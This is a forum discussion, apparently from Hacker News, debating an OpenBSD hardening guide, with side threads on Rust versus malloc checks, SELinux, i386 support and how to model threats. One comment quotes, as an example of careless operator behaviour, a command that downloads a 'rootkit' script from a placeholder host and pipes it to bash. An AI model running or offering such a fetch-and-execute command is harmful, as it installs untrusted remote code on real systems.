So there's one idea that sent me thinking: that actually sounds reasonable, even if inconvenient - remove self from wheel/doas/sudo, and switch VTs to escalate privileges. The reason why this is more secure is because no software running as an unprivileged user could simulate the physical keystrokes necessary for the VT switch. But why does it have to be so inconvenient, what if we could eat the cake and have it too? Maybe just require pressing a certain key combo on the physical keyboard whenever prompted for a password by su/doas/sudo?
Then I remembered! Windows NT did exactly that: you had to press ctrl+alt+del to log in.
"The OpenBSD malloc system allows you to enable some extra checks, like use after free, heap overflow or guard pages..."
How would the added protection compare to safety in rust?
Wouldn't it be useful to develop C on a memory hardened system, then deploy anywhere knowing there were checks during development? Would that help avoid the memory issues later in production?
Rust's borrow checker does not only check heap memory, it checks pointers (references in Rust terminology) to anywhere. Additionally, these checks in malloc are at runtime, whereas the borrow checker is at compile time.
These checks are good, but they do not go as far as Rust does in terms of statically preventing issues.
> Wouldn't it be useful to develop C on a memory hardened system, then deploy anywhere knowing there were checks during development? Would that help avoid the memory issues later in production?
It helps but one aspect of runtime vs compile time checking is that for runtime checks, you only get the checks if you actually exercise the code path that causes the issue. If you ship with some checks on in development, and turn them off in release, you run the risk of having missed cases that will still cause problems.
All of this is better than doing nothing at all, and is a good thing.
At one point, SELinux being on by default made one of the Red Hat distros a pain. This high-friction first impression cost them some adoptions, when an IT manager did a test install. A "softening guide" might've helped.
IIRC, managers were qualified sales leads who were actively looking to move to a supported Linux platform, but got turned off by the installer&docs out-of-box experience that seemed like it was going to make a lot of extra work for them.
I just meant the "softening guide" might've helped from the perspective of the company who'd like to land those customers. I don't think it's the best way, but at the right moment it might've salvaged some sales.
You may be describing OpenBSD ("secure by default") and its FAQ (how to do what you want with it). The OP's hardening guide might be largely seen as going to greater lengths than most people need. (I use its advice about umask, though.)
That sort of hardened environment is what I would expect the sysadmins/operators of the darknet marketplaces to run.
Home directories in memory, proxied outbound SSH connections, high levels of encryption and absolute minimum installed software to do the job required.
The consequences of OpSec failure is.... well, rather serious :)
> That isn’t what they do though. Defcon 30 shared what an actual Darknet user did.
and he got arrested, and did actual prison time. now it sounds like it wasn't all his technical opsec that got him in trouble, but just cuz some dude played fast and loose doesn't mean they all do.
the ones who ain't been caught are probably a lot stricter... or a lot more lucky.
The NSA had a hardening guide you could download for free and deploy on a Windows system if you so desired.
Following all of the advice in the document was an excellent way to end up with a completely useless system. Worse, thanks to Windows horrible logging infrastructure it was almost impossible to figure out exactly what change was causing a particular bit of breakage. You never EVER get an error message that reads anything like "HKLM\SYSTEM\CurrentControlSet\Services\Ramdisk" : Permission Denied reading key "StartOverride", service halted".
Instead it is some generic "the system failed to start" message that doesn't help at all.
Lesson one: Security is a spectrum. There is a difference between "No exploits in our base installation" and "The top nation-states of the world may be trying to load software of unknown capability onto my networked computer".
If Iran had been running their SCADA stuff on hardened OpenBSD systems instead of Windows, maybe the story would have been different though. I'm not saying it's realistic (SCADA drivers may not exist for OpenBSD): what I'm saying though is that only a fool would consider Windows as secure as OpenBSD.
Don't forget the most important security considerations: (1) choose a hardware and OS combination where none of your I/O hardware (video, audio, wifi, etc.) is supported, so that it can never be used to exploit your system; (2) choose an OS so obscure and weird that a potential hacker is guaranteed to have never even heard of it, and would need to study your specific machine for months to make heads or tails of it
Unsupported devices can always become somehow supported and enabled. To harden computer, you remove WiFi cards, cut on-board antennas, desolder mics and speakers, desolder USB ports...
I did that for computer that was used to sign bitcoin transactions offline. User typed hashes manually...
> Unsupported devices can always become somehow supported and enabled
Be very careful if anonymous developers suddenly contribute OpenBSD drivers for every single component in the 20 year old garage sale laptop you use for hosting an "online store" on TOR
One thing I've encountered working with OpenBSD is: change the defaults at your peril. The base system is intended to work and be secure as-is. If you start "hardening" it, expect odd breakage here and there and you will get little sympathy or help from the email lists.
Yes, I did know that, was just a general caution that before you go twisting knobs, be sure you understand what they do and are prepared to diagnose yourself any issues that result.
I hung out with Theo and his team years ago at a security conference. At the time, Subversion was the new hotness, sweeping away CVS as the source code management system de jour. I asked Theo why they didn’t already move to Subversion. His answer stuck with me: CVS is dead simple, everyone understands it, and it just works. Why complicate things?
And that’s the philosophy behind much of OpenBSD. They focus on being able to understand everything from the build tools to the command line tools. Nothing random ever makes its way into OpenBSD (aside from the random number generator, which is ubiquitous). Only a few chosen hands ever commit a line of code to their holy codebase.
they seem to focus on correctness over features. So jails for example would be a lot of complexity.
Rust, if I am not mistaken, has some quirk with the compiler backend that OpenBSD does not like.
Theo also mentioned:
>Such ecosystems come with incredible costs. For instance, rust cannot even compile itself on i386 at present time because it exhausts the address space.
Regardless: The system being secure is a secondary benefit to it being comprehendible and coherent to an individual. It's not enough for the output of a magic box to be a better widget, even if the widget is better in every measurable way. The box itself must not be magic.
Using a static code analyzer, as well as adoption of Rust (which reduces the need for a static code analyzer) - squarely fit in the correctness camp, no?
Note: I'm not a Rust fanboy. But it just seems like Rust aligns very well with OpenBSD core principles.
The Rust thing comes up all the time, and Theo already addressed the issue[1]. Basically it boils down to speed and the fact that OpenBSD runs on some pretty slow hardware and require the full OS to be build on actual hardware.
As for the immutable OS, OpenBSD went the other direction and relink the kernel on each boot.
> the fact that OpenBSD runs on some pretty slow hardware
This is one of my favorite aspects of OpenBSD. I play with a lot of retro hardware and running OpenBSD is an excellent way to make any old hardware feel like new.
Oldest real hardware I've run it on is a 486 DX2-66, oldest virtual hardware was a 386 using OpenBSD 4.1. Also ran a Pentium MMX as a WiFi router for a few weeks while sourcing a replacement.
Despite the "i386" name I don't think contemporary OpenBSD will work on a real 80386 or 80486 system. The supported hardware is described as: "All CPUs compatible with the Intel Pentium or later, with Intel-compatible hardware floating point support should work."
There is also a note: "Due to the increased usage of OpenBSD/amd64, as well as the age and practicality of most i386 hardware, only easy and critical security fixes are backported to i386. The project has more important things to focus on."
I would guess they are not too far from dropping support entirely, but as I understand it that all depends on whether there are any developers interested in still working on it. The OpenBSD developers build the OS for themselves. They make it freely available to anyone who finds it useful, but they do not really build it for "the users."
You're correct, 386 support was dropped after OpenBSD 4.1 (May 2007), and 486 support was dropped after 6.8 (October 2020). If I recall correctly, the project compiler changed after 6.8 and wasn't able to build the entire ports tree when targeting the 486, so they now target Pentium (i586) and higher.
Even though it's technically out-of-date and unsupported, an OpenBSD release from 2020 is still pretty impressive for the DX2 (1993). :)
For a project with such limited resources as OpenBSD, it seems wise for them to drop support for a large number of these legacy platforms and focus on more widely used architectures.
I understand that, supporting more architectures actually help uncover more bugs. But you could still do that with a supported platform list that is 1/2 that size.
Look at what DragonflyBSD has been able to accomplish, truly competitive with Linux regarding performance and features, with the smallest development team out of all the BSDs.
They can do this in large part because they focus on only 1 platform (supporting arch64).
But it isn’t a business that can shuffle human resources at will.
Your point reminds me of Theo losing his shit about how long it took me to build the CD release images I was responsible for. Poor machine crunched for more than a week to do it.
Over the years they have dropped support for a number of platforms[1], but they don't do it based on "popularity" but more whether there are developers (with hardware available) who are interested in working on it.
Not to deny some of those are useful suggestions, but they don't square with the core OpenBSD philosophy. And despite not having these items, they are more secure than products who use them.
It is hard to call OpenBSD an OS focused on security. Beyond pledge their primary focus seems to be "just implement everything correctly and don't run malware". If some utility has an implementation error or you do accidentally run something malicious you are hosed. Compare this to Linux with the extensive use of containerization and things like eBPF for dynamic security measures, or portals as part as flatpak for dynamic application permissions.
> Compare this to Linux with the extensive use of containerization and things like eBPF for dynamic security measures
I think it's an interesting comparison study and I'm not convinced either way of The Right Approach. OpenBSD takes the approach "keep the attack surface as small as possible" while Linux takes the approach "let's bolt a bunch of layers together... good luck making your way through all of it"
So many misconceptions in the same answer. eBPF is for observability, and letting you run privileged programs inside the kernel space (even with protections) can actually increase the potential attack surface. Containerization is not and was never a security measure.
Most of your comment it's bullshit. Containers are not for security, but for convencience and task separation/isolation to avoid the overhead of a vm. eBPF will expose you further more, not less. Also, how can flatpak secure you against a ~/.profile script run at login or an ~/.xprofile one?
A malicious program is going to have a difficult time adding something to your ~/.profile script if it cannot access your home directory. Although I don't doubt that many flatpak programs have too lenient default permissions, and the various XOrg lack of isolation issues are unfortunate somewhat remedied in wayland.
Wayland does not stop a process from manipulating the home directory, doing various things on the network, using a ton of memory, recording what other processes exist etc. Once you add all that stuff you start to get something that looks a lot like containers.
By running OpenBSD as a workstation you already made sure what 99% wouldn't connect with you /redditmode
This guide is partly Security 101, partly for a localhost admin. Things are different when you run an organization with a centrally managed catalogue. Or you are sane and have a clear picture of the attack vectors.
Least privilege? Yes, of course.
Drop inbound by default? Yes, of course and it's amazing how many self-titled Linux Administrators insist what the machine should be 'secure from start so no firewall is needed'. Also this guide implies a workspace which questions what exactly kind of malicious traffic a [single] OpenBSD machine in the network would receive.
Drop outbound by default? Yes and BTW it's pretty easy on Windows, because the Windows Defender Firewall (what a mouthful) is pretty capable to filter by an application, not just by IPs and ports, so you don't need this SOCKS ersatz app firewall.
> Live in a temporary file-system
Now this is just ridiculous. As other said this is Silk Road level of paranoia.
> Disable webcam and microphone
Don't connect them in the first place?
> Disabling USB ports
See the temporary file-system. Good luck finding a notebook with PS/2 or serial ports.
> auto-updating the packages and base system daily on a computer is the minimum that should be done everywhere
Oh god.
> 10.1. Specialized proxies §
> It could be possible to have different proxy users, with each restriction to the remote ports allowed, we could imagine proxies like
> Of course, this is even more tedious than the multipurpose proxy, but at least, it's harder for a program to guess what proxy to use, especially if you don't connect them all at once.
Now this is what bugs me most of this guide.
If you already allowed something to run on your machine then it is usually too late for security through obscurity exercises. Most of the things advised here would just make your life miserable and would lead to disabling or shortcutting them.
I'm surprised that not only is there no application firewall for any of the BSDs, there doesn't even seem to be any need for it. There is OpenSnitch, but only for Linux.
Maybe the closest things are chroot jails and pledge/unveil, both of which are application-specific or built in to the package. (I'm agreeing with you.)
What is the attack vector? Network, physical, both?
Who is the perpetrator? Nation, criminal, NSA, FSB, your disgruntled employee or your {business,sexual} partner trying to bury you?
Who is the operator of this machine? Do you trust him or do you explicitly do not? Does he runs 'curl https://haxx.me/rootkit.sh | bash' every day?
What about maid service?
What services or data is on the machine? Can it be triggered to execute something from a 3rd party endpoint? Do the data comes from the uncontrolled endpoints (eg Internet but this is not the only one vector)?
BTW for those who want to learn... All of these (and more) are also applicable to Linux.
I'm running very hardened Linux "workstations" and things, once setup, just work. I created a shell script verifying lots and lots of things and warning me if I forgot to harden something. I then simply re-run my script every time I install a new Linux (which is not that often). The script even modifies config file for me:
Setting xyz-fribulator is set to 0, although it should be set 2, do you want me to modify xxx.cfg for you? [Y/N]
Makes hardening a new system a breeze.
For example I really don't see why a user should see processes belonging to other users. I've got about 30 settings like that, plus a beefy firewall, plus, as in TFA, a "no sudo / no doas" from the regular user rule.
Then I remembered! Windows NT did exactly that: you had to press ctrl+alt+del to log in.